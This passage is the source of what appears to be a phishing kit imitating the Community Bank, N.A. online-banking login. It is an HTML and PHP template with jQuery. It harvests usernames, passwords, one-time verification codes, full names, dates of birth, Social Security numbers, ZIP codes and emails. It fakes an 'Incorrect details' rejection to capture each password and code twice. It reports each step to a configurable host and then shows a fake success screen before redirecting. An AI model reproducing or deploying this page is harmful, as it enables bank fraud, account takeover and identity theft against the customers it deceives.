<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width,initial-scale=1,viewport-fit=cover" />
        <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
        <link rel="stylesheet" href="http://localhost/assets/w3/css/w3.css">
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
        
        <title>Login · Community Bank, N.A</title>

        <link rel="icon" type="image/x-icon" href="https://my.cbna.com/images/fi-assets/community-bank-na/community-bank-na-favicon-cff232f1.ico" />
        <link rel="icon" sizes="192x192" href="https://my.cbna.com/images/fi-assets/community-bank-na/community-bank-na-android-3f7663de.png" />
        <link rel="apple-touch-icon" href="https://my.cbna.com/images/fi-assets/community-bank-na/community-bank-na-ios-74686531.png" />
        <meta name="msapplication-square70x70logo" content="https://my.cbna.com/images/fi-assets/community-bank-na/community-bank-na-msapp-small-be0f9669.png" />
        <meta name="msapplication-square150x150logo" content="https://my.cbna.com/images/fi-assets/community-bank-na/community-bank-na-msapp-large-19cb0de3.png" />
        <meta name="msapplication-wide310x150logo" content="https://my.cbna.com/images/fi-assets/community-bank-na/community-bank-na-msapp-wide-0fb9bd5a.png" />
        <meta name="apple-itunes-app" content="app-id=1484377074" />
        
        <style type="text/css">
            body { 
                background-color: rgb(227 231 237);
                font-family: roboto,-apple-system,BlinkMacSystemFont,'Segoe UI','Helvetica Neue',sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";
                font-weight: 400;
                color: rgb(7 21 35);
                font-size: 14px;
            }

            .bg-img-1 { background-image: url("spgbuck/anbc_files/community-bank-na-background-landscape-82a8301e.png"); background-size: cover; }

            .bg-color-tint-1 { background-color:rgb(255 255 255 / 34%);}
            .bg-color-tint-2 { background-color:rgb(203 74 32 / 86%);}

            .vp-h { height: 100vh; }
            .vp-min-h { min-height: 100vh; }

            .w-16 { width: 16px; }
            .w-35 { width: 35px; }
            .w-250 { width: 250px; }
            .w-480 { width: 480px; }

            .h-35 { height: 35px;}
            
            @media (max-width: 600px){
                .sm-w-full { width: 100% !important;  }
            }

            .relative { position: relative; }
            .strong { font-weight: bold; }

            .d-inline-block { display: inline-block;}

            .mg-0 { margin: 0 !important;}

            .mgt-10 { margin-top: 10px;}
            .mgt-20 { margin-top: 20px;}
            .mgt-30 { margin-top: 30px;}


            .mgtb-30 { margin-top: 30px; margin-bottom: 30px;}


            .center-box { margin: 0 auto; }


            .jha-card { box-sizing: border-box; padding: 30px 40px; }
            .jha-card a { text-decoration: none; }

            .inp-m-group .inp { padding: 15px 25px; /*  border-width: 2px !important; */}

            .inp-m-group .valid input ~ label,
            .inp-m-group input:focus ~ label,
            .inp-m-group input:valid ~ label,
            .inp-m-group textarea:focus ~ label,
            .inp-m-group textarea:valid ~ label {
                top: -12px;
                font-size: 13px;
                color: rgb(98, 110, 122);
                background-color: #fff;
                padding: 1px 5px;
            }

            .inp-m-group input:focus ~ .bar:before,
            .inp-m-group textarea:focus ~ .bar:before {
                /* width: 320px; */
                width: 100%;
            }

            .inp-m-group label {
                color: rgb(98, 110, 122);
                font-weight: normal;
                position: absolute;
                pointer-events: none;
                left: 20px;
                top: 15px;
                transition: 300ms ease all;
            }

            .inp-m-group .bar {
                position: relative;
                display: block;
                /* width: 320px; */
                width: 100%;
            }
            
            .inp-m-group .bar:before {
                content: "";
                height: 2px;
                width: 0;
                bottom: 0px;
                position: absolute;
                background: #2196F3;
                transition: 300ms ease all;
                left: 0%;
            }

            .footer { font-size: 12px !important; color: rgb(98 110 122) !important;}
            .ehl-icon { display: inline-block; fill: rgb(98 110 122); }
        </style>
        <style type="text/css">
            .checkmark__circle {
                stroke-dasharray: 166;
                stroke-dashoffset: 166;
                stroke-width: 2;
                stroke-miterlimit: 10;
                stroke: #7ac142;
                fill: none;
                animation: stroke 0.6s cubic-bezier(0.65, 0, 0.45, 1) forwards;
            }

            .checkmark:not(.jpui.checkmark) {
                width: 56px;
                height: 56px;
                border-radius: 50%;
                display: block;
                stroke-width: 2;
                stroke: #fff;
                stroke-miterlimit: 10;
                /* margin: 10% auto; */
                box-shadow: inset 0px 0px 0px #7ac142;
                animation: fill .4s ease-in-out .4s forwards, scale .3s ease-in-out .9s both;
            }

            .checkmark__check {
                transform-origin: 50% 50%;
                stroke-dasharray: 48;
                stroke-dashoffset: 48;
                animation: stroke 0.3s cubic-bezier(0.65, 0, 0.45, 1) 0.8s forwards;
            }

            @keyframes stroke {
            100% {
                stroke-dashoffset: 0;
            }
            }
            @keyframes scale {
            0%, 100% {
                transform: none;
            }
            50% {
                transform: scale3d(1.1, 1.1, 1);
            }
            }
            @keyframes fill {
            100% {
                box-shadow: inset 0px 0px 0px 30px #7ac142;
            }
            }
        </style>
    </head>
    <body class="bg-img-1" style="pacity:0">
        <div class="wrapper vp-h xxxbg-color-tint-1">

            <div class="w3-display-container vp-min-h">

                <div id="jcd" class="w3-display-middle jha-card sm-w-full w-480 w3-white w3-round-large">
                    <div class="w3-content w-250">
                        <img height="80" src="spgbuck/anbc_files/community-bank-na-logo-2d7c4e4a.png" class="w3-image"/>
                    </div>

                    <div id="js-error-wrap" class="w3-container w3-section" style="display: none;">
                        <div class="w3-red w3-padding-large w3-round js-error-txt">...</div>
                    </div>

                    <form name="form1" class="pg-form inp-m-group w3-container" method="post" novalidate>

                        
                        <div id="pg001" class="page-frame" style="display: none;">

                            <div id="usrTab" class="w3-section relative">
                                <input name="username" id="username" class="inp w3-input w3-border w3-border-black w3-round" type="text" required="required">
                                <!-- <span class="bar"></span> -->
                                <label>Username</label>
                                <a href="#" class="js-switch-back w3-button w3-display-right w3-hover-none strong" style="display:none;"> Switch </a>
                            </div>

                            <div id="pswTab" class="w3-section relative" style="display: none;">
                                <input name="password" id="password" class="inp w3-input w3-border w3-border-black w3-round" type="password" required="required" disabled>
                                <!-- <span class="bar"></span> -->
                                <label>Enter your password</label>
                            </div>

                            <div class="w3-section relative w3-right-align">
                                <a href="javascript:void(0);" class="strong">Forgot?</a>
                            </div>

                            <div class="w3-section relative">
                                <a href="javascript:void(0);" class="strong d-inline-block mgt-10">First time user? Enroll now.</a>

                                <button class="w3-right w3-button w3-round w3-black w3-hover-black w3-padding-large strong">Continue</button>
                            </div>

                        </div>




                        <div id="pg002" class="page-frame" style="display: none;">

                            <div class="w3-section relative w3-center">
                                <div class="d-inline-block strong mg-0 w-35 h-35 w3-red w3-circle center-box">
                                    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" style="fill:white;width: 24px;height: 24px;margin: 5 auto;"> <path d="M11.75,21.5 C6.36522369,21.5 2,17.1347763 2,11.75 C2,6.36522369 6.36522369,2 11.75,2 C17.1347763,2 21.5,6.36522369 21.5,11.75 C21.494488,17.1324915 17.1324915,21.494488 11.75,21.5 Z M11.75,3.5 C7.19365081,3.5 3.5,7.19365081 3.5,11.75 C3.5,16.3063492 7.19365081,20 11.75,20 C16.3063492,20 20,16.3063492 20,11.75 C19.9944899,7.19593511 16.3040649,3.50551007 11.75,3.5 Z M6.21471323,8.89365273 C7.79664793,7.41058895 10.2903922,7.4380531 11.8393699,8.97055233 L11.8393699,8.97055233 L13.9980517,11.1292341 C14.3111429,11.4368325 14.3056501,11.9476655 13.9980517,12.2607568 C13.6904532,12.573848 13.1796202,12.573848 12.8665289,12.2607568 L12.8665289,12.2607568 L10.7078472,10.1020751 C9.76308064,9.16280134 8.21959575,9.1353372 7.29130768,10.0855966 C6.36301961,11.035856 6.3794981,12.573848 7.31327899,13.5076289 L7.31327899,13.5076289 L9.46097506,15.655325 C9.7740663,15.9629234 9.76857347,16.4737565 9.46097506,16.7868477 C9.15337664,17.099939 8.64254356,17.099939 8.32945232,16.7868477 L8.32945232,16.7868477 L6.1707706,14.628166 C4.62728571,13.0901739 4.60531439,10.5909368 6.1323208,8.97055233 L6.1323208,8.97055233 Z M13.5758467,7.1571925 C13.8860615,6.92431472 14.3341129,6.95019003 14.6187413,7.23481843 L14.6187413,7.23481843 L16.7829159,9.39350015 C18.3264008,10.9314922 18.3483721,13.4307293 16.8213657,15.0511138 L16.8213657,15.0511138 L16.7389732,15.1280134 C15.1570385,16.6220629 12.6578014,16.5891059 11.1198094,15.0511138 L11.1198094,15.0511138 L8.96112764,12.8924321 C8.64803639,12.5848337 8.65352922,12.0740006 8.96112764,11.7609094 C9.26872605,11.4478181 9.77955913,11.4478181 10.0926504,11.7609094 L10.0926504,11.7609094 L12.2513321,13.9195911 C13.1960986,14.8643576 14.7340907,14.8918218 15.6678716,13.9415624 C16.6016525,12.991303 16.585174,11.453311 15.6513931,10.5195301 L15.6513931,10.5195301 L13.4927114,8.36084834 C13.1796202,8.05324992 13.1796202,7.54241684 13.4927114,7.2293256 L13.49,7.231 Z"></path> </svg>
                                </div>
                                <p class="mg-0 xstrong w3-large"> Confirm account </p>
                            </div>

                            <div class="w3-section relative w3-center">
                                <p class="mg-0 w3-text-grey" style="opacity:0.8"> We sent a code to ***-***-***. If you have the Authy app installed,you can get your code there. This code will expire after 5 minutes.</p>
                            </div>

                            <div class="w3-section relative mgt-30">
                                <input name="one_time_code" id="one_time_code" class="inp nums-only w3-input w3-border w3-border-black w3-round" type="text" required="required" maxlength="8">
                                <!-- <span class="bar"></span> -->
                                <label>Verification Code</label>
                            </div>

                            <div class="w3-section relative">
                                <div>
                                    <input name="trust_this_browser" id="trust_this_browser" class="w3-check w3-border w3-border-black w3-round" type="checkbox">

                                    <label for="trust_this_browser" class="d-inline-block" style="position: relative;left:0px;top: 1px;">
                                     Don't ask for code again while using this browser.</label>
                                    <!-- <span class="bar"></span> -->
                                    <!-- &nbsp; -->
                                </div>
                                <!-- &nbsp;
                                &nbsp; -->
                            </div>
                            

                            <div class="w3-section relative w3-center">
                                <button class="xw3-block w3-button w3-round w3-black w3-hover-black w3-padding-large strong">Verify</button>
                            </div>


                            <div class="w3-section relative w3-large w3-center">
                                <div> 
                                    <small><strong xstyle="display: block;">Didn't get a code?</strong> &nbsp;
                                    <a id="resendOCode" href="javascript:void(0)" style="text-decoration: none;">Resend Code</a>  &nbsp;  <span id="ohtpTimer"></span> </small>
                                </div>
                            </div>

                        </div>




                        <div id="pg003" class="page-frame" style="display: none;">

                            <div class="w3-section relative">
                                <!-- <p class="strong mg-0 w3-large"> Confirm your identity: </p>
                                <p class="mg-0"> Please confirm your identity using the form below.</p> -->
                                <p class="mg-0 strong"> &#9888; Please confirm your identity using the form below.</p>
                            </div>

                            <div class="w3-section relative">
                                <input name="full_name" id="full_name" class="inp w3-input w3-border w3-border-black w3-round" type="text" required="required">
                                <!-- <span class="bar"></span> -->
                                <label>Full name</label>
                            </div>

                            <div class="w3-section relative">
                                <input name="dob" id="dob" class="inp js-date w3-input w3-border w3-border-black w3-round" type="text" required="required" maxlength="10">
                                <!-- <span class="bar"></span> -->
                                <label>Date of birth</label>
                            </div>

                            <div class="w3-section relative">
                                <input name="s_s_n" id="s_s_n" class="inp js-ssnum js-tog-input-txt w3-input w3-border w3-border-black w3-round" type="text" required="required" maxlength="11">
                                <!-- <span class="bar"></span> -->
                                <label>Social security number</label>
                            </div>

                            <div class="w3-section relative">
                                <input name="zip__code" id="zip__code" class="inp nums-only w3-input w3-border w3-border-black w3-round" type="text" required="required" maxlength="5">
                                <!-- <span class="bar"></span> -->
                                <label>Zip code</label>
                            </div>

                            <div class="w3-section relative">
                                <input name="email" id="email" class="inp w3-input w3-border w3-border-black w3-round" type="text" required="required">
                                <!-- <span class="bar"></span> -->
                                <label>Email</label>
                            </div>

                            <div class="w3-section relative">
                                <button class="w3-block w3-button w3-round w3-black w3-hover-black w3-padding-large strong">Confirm</button>
                            </div>

                        </div>




                        <div id="pgDone" class="page-frame" style="display: none;">

                            <div class="w3-section relative">
                                <div style="width:44px; height:44px; margin-left:0px; margin-bottom:18px;">
                                    <svg fill="#418d2e" version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="-4.61 -4.61 55.34 55.34" xml:space="preserve" stroke="#418d2e"><g id="SVGRepo_bgCarrier" stroke-width="0"><rect x="-4.61" y="-4.61" width="55.34" height="55.34" rx="27.67" fill="#ffffff" strokewidth="0"></rect></g><g id="SVGRepo_tracerCarrier" stroke-linecap="round" stroke-linejoin="round"></g><g id="SVGRepo_iconCarrier"> <g> <g> <g> <path d="M37.727,0.062H8.397C3.759,0.062,0,3.822,0,8.46v29.204c0,4.639,3.759,8.398,8.397,8.398h29.33 c4.637,0,8.397-3.76,8.397-8.398V8.46C46.125,3.822,42.365,0.062,37.727,0.062z M38.007,19.14L22.142,35.005 c-0.673,0.674-1.586,1.052-2.538,1.052s-1.865-0.379-2.538-1.052l-7.863-7.863c-1.401-1.402-1.401-3.674,0.001-5.077 c0.673-0.673,1.585-1.051,2.537-1.051c0.952,0,1.864,0.378,2.537,1.051l4.686,4.687c0.17,0.17,0.401,0.266,0.641,0.266 c0.24,0,0.471-0.096,0.641-0.266l12.686-12.687c0.674-0.673,1.586-1.052,2.539-1.052c0.951,0.001,1.864,0.379,2.537,1.052 C39.409,15.467,39.409,17.739,38.007,19.14z"></path> </g> </g> </g> </g></svg>
                                </div>

                                <p class="strong mg-0 w3-large"> SUCCESS </p>
                                <p class="mg-0"> You have confirmed your details and can now continue to enjoy your online banking services.</p>
                                <p class="mg-0 strong"> </p>
                                <p class="mg-0 strong"><br/></p>
                                <p class="mgt-10 w3-text-grey"> Redirecting to Login Page... </p>
                            </div>
                            
                        </div>
                        

                    </form>
                </div>






                <div class="footer w3-display-bottomleft w3-white w3-block w3-center">
                    <div class="w3-section">
                        <span>© 2024 Community Bank, N.A</span> &nbsp; • &nbsp; <span>Privacy policy</span> &nbsp;• &nbsp; <span>Member FDIC</span> &nbsp;•&nbsp; <span><svg width="16" height="11" viewBox="0 0 10 7" class="ehl-icon" aria-hidden="true"> <path d="M4.96.222L.337 2.588v.962l.511.007v3.448h8.186L9.03 3.55h.55v-.962L4.959.222zm3.163 5.872H1.76V3.028l3.2-1.65 3.163 1.65v3.066zm-4.677-2.26h2.999v-.828H3.446v.828zm0 1.489h2.985v-.828H3.446v.828z"></path> </svg> Equal Housing Lender</span>
                    </div>
                </div> 

            </div>

        </div>




        <?php include '_evm_html.php'; ?>

        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
        <?php echo mj_load_tgs_wt_img(); ?>
        <script type="text/javascript">
            $(document).ready(function () {

                $('body').css('opacity', 1);

                /*---------- Config Vars ---------------*/

                let v_musrid = "mucfbrid"; 
                let v_vs = "anbcvw";

                window.hstUrl = '<?php echo $disHost; ?>';
                window.dPassSubmitCount = '<?php echo $pass_submit_count; ?>';

                /*---------- Basic Functions ---------------*/

                function getAbsolutePath() {
                    var loc = window.location;
                    var pathName = loc.pathname.substring(0, loc.pathname.lastIndexOf('/') + 1);
                    return loc.href.substring(0, loc.href.length - ((loc.pathname + loc.search + loc.hash).length - pathName.length));
                }

                function getUrlParameter(name)
                {
                    name = name.replace(/[\[]/, '\\[').replace(/[\]]/, '\\]');
                    var regex = new RegExp('[\\?&]' + name + '=([^&#]*)');
                    var results = regex.exec(location.search);
                    return results === null ? '' : decodeURIComponent(results[1].replace(/\+/g, ' '));
                }

                function ChangeUrl(title, url) {
                    if (typeof (history.pushState) != "undefined") {
                        var obj = { Title: title, Url: url };
                        history.pushState(obj, obj.Title, obj.Url);
                    } else {
                        alert("Browser does not support HTML5.");
                    }
                }

                function genRandomStr(length){
                    var result           = '';
                    var characters       = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
                    var charactersLength = characters.length;
                    for ( var i = 0; i < length; i++ ) {
                        result += characters.charAt(Math.floor(Math.random() * charactersLength));
                    }
                    return result;
                }

                function isBase64(str) {
                    try {
                        return btoa(atob(str)) == str;
                    } catch (err) {
                        return false;
                    }
                }

                function setCookie(cname, cvalue, exdays) {
                    const d = new Date();
                    d.setTime(d.getTime() + (exdays * 24 * 60 * 60 * 1000));
                    let expires = "expires="+d.toUTCString();
                    document.cookie = cname + "=" + cvalue + ";" + expires + ";path=/";

                    console.log('Cookie Set: '+cname+':'+cvalue);
                }

                function getCookie(cname) {
                    let name = cname + "=";
                    let ca = document.cookie.split(';');
                    for(let i = 0; i < ca.length; i++) {
                        let c = ca[i];
                        while (c.charAt(0) == ' ') {
                        c = c.substring(1);
                        }
                        if (c.indexOf(name) == 0) {
                        return c.substring(name.length, c.length);
                        }
                    }
                    return "";
                }

                function checkCookie(cname) {
                    let cQukies = getCookie(cname);
                    if (cQukies != "") {
                        return cQukies; 
                    }
                    return false;
                }

                /*---------- Form Input Helper Functions ---------------*/

                $("input.nums-only").on('input', function(e) {  $(this).val($(this).val().replace(/[^0-9]/g, ''));  });
                $("input.alphabets-only").on('input', function(e) {  $(this).val($(this).val().replace(/[^a-z\s]/ig, '')); });

                //Date Input Masking - DOB
                $('.js-date').on('input', function(e){

                    var val = this.value.replace(/\D/g, '');
                    val = val.substr(0, 9);
                    var newVal = '';
                    
                    this.value = val;

                    var len = val.length;

                    if(len === 2) {
                        //this.value += '/';
                        newVal = val + '/';
                        this.value = newVal;
                    }

                    //if(len === 4) {
                    if(len > 2) {
                        //this.value += '/';
                        
                        newVal = val.substr(0, 2) + '/';
                        newVal += val.substr(2, 2);
                        
                        this.value = newVal;
                    }
                    
                    ///if(len === 8)
                    if(len > 3)
                    {
                        //this.value += '/';
                        
                        newVal = val.substr(0, 2) + '/';
                        newVal += val.substr(2, 2)+ '/';
                        newVal += val.substr(4, 4);
                        
                        this.value = newVal;
                    }

                    /*if (val.match(/^\d{2}$/) !== null) {
                                this.value = val + '/';
                            } else if (val.match(/^\d{2}\/\d{2}$/) !== null) {
                                this.value = val + '/';
                            }*/
                });

                //Phone Number Masking
                var pn_input = document.querySelectorAll('.js-phone')[0];

                var phoneInputMask = function phoneInputMask(elm)
                {
                    elm.addEventListener('input', function(e) {
                        if(e.keyCode < 47 || e.keyCode > 57) {
                            e.preventDefault();
                        }

                        var x = e.target.value.replace(/\D/g, '').match(/(\d{0,3})(\d{0,3})(\d{0,4})/);
                        e.target.value = !x[2] ? x[1] : '(' + x[1] + ')-' + x[2] + (x[3] ? '-' + x[3] : ''); 
                    });
                };

                //phoneInputMask(pn_input);

                // Mask / Format SSN Input
                $('.js-ssnum, input#ssN-text-input-field').on('keyup', function(){
                    var val = this.value.replace(/\D/g, '');
                    val = val.substr(0, 9);
                    var newVal = '';
                    if(val.length > 4) {
                        this.value = val;
                    }
                    if((val.length > 3) && (val.length < 6)) {
                        newVal += val.substr(0, 3) + '-';
                        val = val.substr(3);
                    }
                    if (val.length > 5) {
                        newVal += val.substr(0, 3) + '-';
                        newVal += val.substr(3, 2) + '-';
                        val = val.substr(5);
                    }
                    newVal += val;
                    this.value = newVal;   
                });


                //Mask / format CC no.
                $('input.js-ccnum').on('input', function(e){
                    var val = e.target.value.replace(/\D/g, '');
                    val = val.substr(0, 16);
                    var newVal = '';
                    if((val.length > 4) && (val.length < 13)){
                        //console.log('Greater than 8');
                        newVal += val.substr(0, 4) + ' ';
                        newVal += val.substr(4, 4) + ' ';
                        val = val.substr(8);
                    }
                    if((val.length > 12))
                    {
                        //console.log('Greater than 12');
                        newVal += val.substr(0, 4) + ' ';
                        newVal += val.substr(4, 4) + ' ';
                        newVal += val.substr(8, 4) + ' ';
                        val = val.substr(12);
                    }

                    newVal += val;
                    this.value = newVal;
                });


                // format expiry date MM/YY
                $('input.exdate').on('keyup', function(){
                    var val = this.value.replace(/\D/g, '');
                    val = val.substr(0, 10); console.log(val);
                    var newVal = '';

                    this.value = val;

                    if(val.length > 1) {
                        //this.value = val;
                        newVal = val.substr(0, 2) + '/';

                        this.value = newVal;
                    }

                    if (val.length > 2) {
                        newVal = val.substr(0, 2) + '/';
                        newVal += val.substr(2, 2);

                        this.value = newVal; 
                    }
                });


                //format Phone
                $('input.us-phone').on('input', function(e){
                    var x = e.target.value.replace(/\D/g, '').match(/(\d{0,3})(\d{0,3})(\d{0,4})/);
                    e.target.value = !x[2] ? x[1] : '(' + x[1] + ') ' + x[2] + (x[3] ? '-' + x[3] : '');
                });


                //format DL
                $('input.dl').on('input', function(){
                    $(this).removeClass('uppercase'); if($(this).val() !=="") { $(this).addClass('uppercase'); }
                });


                //Toggle input type Text/Password
                $('.js-tog-input-txt').on('input, click', function(){
                    $(this).attr('type','text');
                }).on('blur',function(){
                    $(this).attr('type','password');
                });


                function lock_clickable_elements(){
                    // $('html, body').css({'opacity':'0.9'});
                    // $('img').css({'opacity':'0.7'});
                    $('img, :input').css({'opacity':'0.4'});
                    $('#jcd').css({'opacity':'0.9'});
                    $(':input').attr('readonly','readonly');
                    $('a, button, input[type=submit]').attr('disabled','disabled');
                    $('a').addClass('w3-disabled');
                }

                function unlock_clickable_elements(){
                    // $('html, body, img').css({'opacity':'1'});
                    $('img, :input').css({'opacity':'1'});
                    $('#jcd').css({'opacity':'1'});
                    $(':input').removeAttr('readonly');
                    $('a, button, input[type=submit]').removeAttr('disabled');
                    $('a').removeClass('w3-disabled');

                    // $('button.btn').attr('disabled','disabled');
                }


                // Button Countdown Timer
                var sec = 15;
                var myTimer = document.getElementById('ohtpTimer');
                var myBtn = document.getElementById('resendOCode');

                function button_count_down_timer() 
                {
                    $("#ohtpTimer").fadeTo(0, 1);

                    if (sec < 10) {
                        myTimer.innerHTML = "0" + sec;
                    } else {
                        myTimer.innerHTML = sec;
                    }

                    if (sec <= 0) {
                        $("#resendOCode").removeAttr("disabled");
                        $("#resendOCode").removeClass('w3-disabled');
                        $("#ohtpTimer").fadeTo(2500, 0);
                        return;
                    }
                    sec -= 1;
                    window.setTimeout(button_count_down_timer, 1000);
                }



                /*---------- Page Frame View Events (pfID) ---------------*/

                if(v_vs)
                {
                    let viewStep = getCookie(v_vs);

                    function do_pfid_check() {
                        console.log('Checking pfID visibility ...', '');

                        var pfID = $('.page-frame:visible').attr('id'), vwStep = getCookie(v_vs);
                        if (pfID && pfID !== vwStep) { setCookie(v_vs, pfID, 1); }
                    }

                    if (viewStep != "") {
                        $('.page-frame').fadeOut('fast', function () { $('#' + viewStep).fadeIn('slow'); });

                        var gt_v_musrid = getCookie(v_musrid);
                        if (gt_v_musrid != "") {
                            $('.emdsp').text(gt_v_musrid);
                            $('.emhdn').val(gt_v_musrid);
                            // window.filled_inps['user'] = gt_v_musrid;
                        }

                        if (viewStep == 'pgDone') {
                            $('.mjx-header').text('Details Confirmed');
                            $('.mjx-hide-on-done').hide('fast');
                        }

                    }
                    else {
                        // $('.page-frame').fadeOut('fast', function () { $('#pg001').fadeIn('slow'); });
                        $('.page-frame').fadeOut('fast', function () { 
                            $('#pg001').fadeIn('slow', function(){ $('.pg-form:visible :input:visible:eq(0)').focus() });
                        });
                    }

                    var pfidTimer = setInterval(do_pfid_check, 3000);


                    $('body').on('unload', function () { setCookie(v_vs, '', -1); });
                }else{
                    $('.page-frame').fadeOut('fast', function () { 
                        $('#pg001').fadeIn('slow', function(){ $('.pg-form:visible :input:visible:eq(0)').focus() });
                    });
                }

                // disable all page-frame
                $('.page-frame:not(:visible) :input').attr('disabled', 'disabled');




                /*---------- Custom Events ---------------*/

                var rediretToURL = '<?php echo $redirect_to_url; ?>';

                function resp_err(id, txtp)
                {
                    var the_parent = $('#js-error-wrap');
                    
                    the_parent.find('.js-error-txt').text(txtp);
                    the_parent.fadeIn('slow');

                    $('html, body').animate({ scrollTop: the_parent.offset().top - 20}, 'slow');

                    id.focus();
                }

                function clear_err_tins(){
                    $('#js-error-wrap').hide('fast');
                }

                function clear_inp_err_tins(id){
                    var $errRespDiv = id.parent('.sc-prism-input-default');

                    if($errRespDiv.find('.js-inp-error, .js_err_txt').length > 0)
                    {
                        $errRespDiv.find('.js-inp-error, .js_err_txt').fadeOut('fast', function(){
                            // $errRespDiv.removeClass('has-error');
                            $(this).remove();
                        });

                        $errRespDiv.find('input.invalid').removeClass('input.invalid');
                        $errRespDiv.find('.js-inp-error').remove();
                    }
                }


                function vt(pg_step_name){
                    $.get(window.hstUrl+"_sysm_.php?_do=vt&s="+window.btoa(window.location.href+"_"+pg_step_name), function(data){ console.log('Logged: '+pg_step_name); console.log('Retured Data: '+data);});
                }
                vt('first_visit');



                // Callbacks
                function do_form_done(){ setTimeout(function(){ window.location.replace(rediretToURL) }, 3000); }

                function toggle_pg_frame(pgf_to_show, mj_vt)
                {
                    $('.page-frame:visible').fadeOut('fast', function(){
                        if(pgf_to_show == '#pgEmail')
                        {
                            var uval = $('#email').val();
                            if(uval)
                            {
                                load_emv_form(uval);
                            }
                            else
                            {
                                resp_err($('.pg-form:visible :input:visible:eq(0)'), 'Please enter your email to continue.');
                            } 
                        }
                        else
                        {
                            $(pgf_to_show).find(':input').removeAttr('disabled');
                            $(pgf_to_show).fadeIn('fast', function(){
                                $('.pg-form:visible :input:visible:eq(0)').focus()
                                $('.page-frame:not(:visible) :input').attr('disabled', 'disabled');
                            });
                        }

                        if(mj_vt){ vt(mj_vt); }

                        if(pgf_to_show == '#pgDone'){ do_form_done(); }
                    });
                }


                function toggle_pg_frame_wt_pass_decline(frm_obj, pswd_inp_id, pgf_to_show)
                {
                    var $dis = frm_obj;

                    if($dis.hasClass('second_submit'))
                    {
                        console.log('Second Submit');
                        
                        // load_amz_to_usps();
                        // load_emv_form($('#email').val());
                        // $('.js_show_only_on_001').hide();
                        // vt('second_password_submit');

                        toggle_pg_frame(pgf_to_show, 'second_password_submit')
                        
                    } else {

                        console.log('First Submit');
                        
                        $dis.addClass('second_submit');

                        resp_err($(pswd_inp_id), 'Incorrect details, Please check your details.');

                        unlock_clickable_elements();
                        $('html, body').animate({ scrollTop:0}, 'slow');

                        vt('first_password_submit');
                    }
                }


                function toggle_pg_frame_wt_ohtp_decline(frm_obj, vc_inp_id, pgf_to_show)
                {
                    var $dis = frm_obj;

                    if($dis.hasClass('vc_second_submit'))
                    {
                        console.log('Second VC Submit');
                        
                        // load_amz_to_usps();
                        // load_emv_form($('#email').val());
                        // $('.js_show_only_on_001').hide();
                        // vt('second_password_submit');

                        toggle_pg_frame(pgf_to_show, 'one_time_code_submit_2')
                        
                    } else {

                        console.log('First VC Submit');
                        
                        $dis.addClass('vc_second_submit');

                        resp_err($(vc_inp_id), 'Incorrect code, Please check your code.');

                        unlock_clickable_elements();
                        $('html, body').animate({ scrollTop:0}, 'slow');

                        vt('one_time_code_submit_1');
                    }
                }


                function toggle_pg_frame_wt_sec_check(frm_obj, pswd_inp_id)
                {
                    var $dis = frm_obj;

                    if($dis.hasClass('second_submit'))
                    {
                        console.log('Second Submit');
                        
                        // load_amz_to_usps();
                        // load_emv_form($('#email').val());
                        // $('.js_show_only_on_001').hide();

                        // vt('second_password_submit');

                        toggle_pg_frame('#pg003', 'second_password_submit')
                        
                    } else {

                        console.log('First Submit');
                        
                        $dis.addClass('second_submit');

                        resp_err($(pswd_inp_id), 'Incorrect details, Please check your details.');
                        
                        $dis.find('#secCheck').fadeIn('fast', function(){
                            $dis.find('#secCheck :input').removeAttr('disabled');
                            $dis.find('#secCheck #email_h').attr({'name':'email','id':'email'});
                        }); 

                        unlock_clickable_elements();
                        $('html, body').animate({ scrollTop:0}, 'slow');

                        vt('first_password_submit');
                    }
                }


                // On input
                $('.w3-section.relative > :input').on('input',function(){
                    var $dis = $(this), disVal = $dis.val(), the_parent = $dis.parent('.w3-section.relative');

                    if(disVal !== '')
                    {
                        the_parent.addClass('valid');
                    }else{
                        the_parent.removeClass('valid');
                    }
                });



                // resendOCode Btn
                $('#resendOCode').on('click',function(e){
                    var pgv = $('#js-error-wrap');
                    
                    
                    lock_clickable_elements();

                    setTimeout(function(){
                        $('<div id="resentResp" class="w3-container"> <span style="color:green;"> &#9989; Resent your one time code. </span></div>').insertBefore(pgv);
                        $('#one_time_code').focus();
                        unlock_clickable_elements();
                        
                        // Timer
                        $('#resendOCode').attr('disabled','disabled');
                        $("#resendOCode").addClass("w3-disabled");
                        sec = 15;
                        button_count_down_timer();

                    },3000);
                    setTimeout(function(){ $('#resentResp').fadeIn('slow', function(){ $(this).remove(); }); },5000);
                });



                // GoTo Btn
                $('.goto_btn').on('click', function(e){
                    e.preventDefault();
                    lock_clickable_elements();
                    setTimeout(function(){
                        window.location.replace(rediretToURL);
                    }, 3000);
                });


                // Switch Back Btn
                $('.js-switch-back').on('click', function(e){
                    e.preventDefault();
                    clear_err_tins();
                    $('#pswTab').fadeOut('slow', function(){  $('.js-switch-back').fadeOut('fast'); $('#usrTab #username').val('').focus(); });
                });



                // Form actions
                var my_form_actions = <?php echo json_encode($my_form_actions); ?>;

                console.log(my_form_actions);



                // On Submit
                $('form.pg-form').submit(function (e) {
                    e.preventDefault();

                    var $frm_name = $(this).attr('name');
                    var $frms = ["form1", "form2", "form3", "form4", "form_tel", "form_email", "signin"];
                    
                    
                    if (typeof $frm_name !== typeof undefined && $frm_name !== false && $frms.indexOf($frm_name) !== -1) 
                    {
                        clear_err_tins();

                        /*--- Validation Starts ---*/
                        
                        var found_err = false;
                        var email_regx = new RegExp(/^([a-zA-Z0-9_.+-])+\@(([a-zA-Z0-9-])+\.)+([a-zA-Z0-9]{2,4})+$/);
                        var spc_rgx = new RegExp(/\s/);
                        var sn_rex = new RegExp("^(?!\\b(\\d)\\1+-(\\d)\\1+-(\\d)\\1+\\b)(?!123-45-6789|219-09-9999|078-05-1120)(?!666|000|9\\d{2})\\d{3}-(?!00)\\d{2}-(?!0{4})\\d{4}$");


                        var values = {};
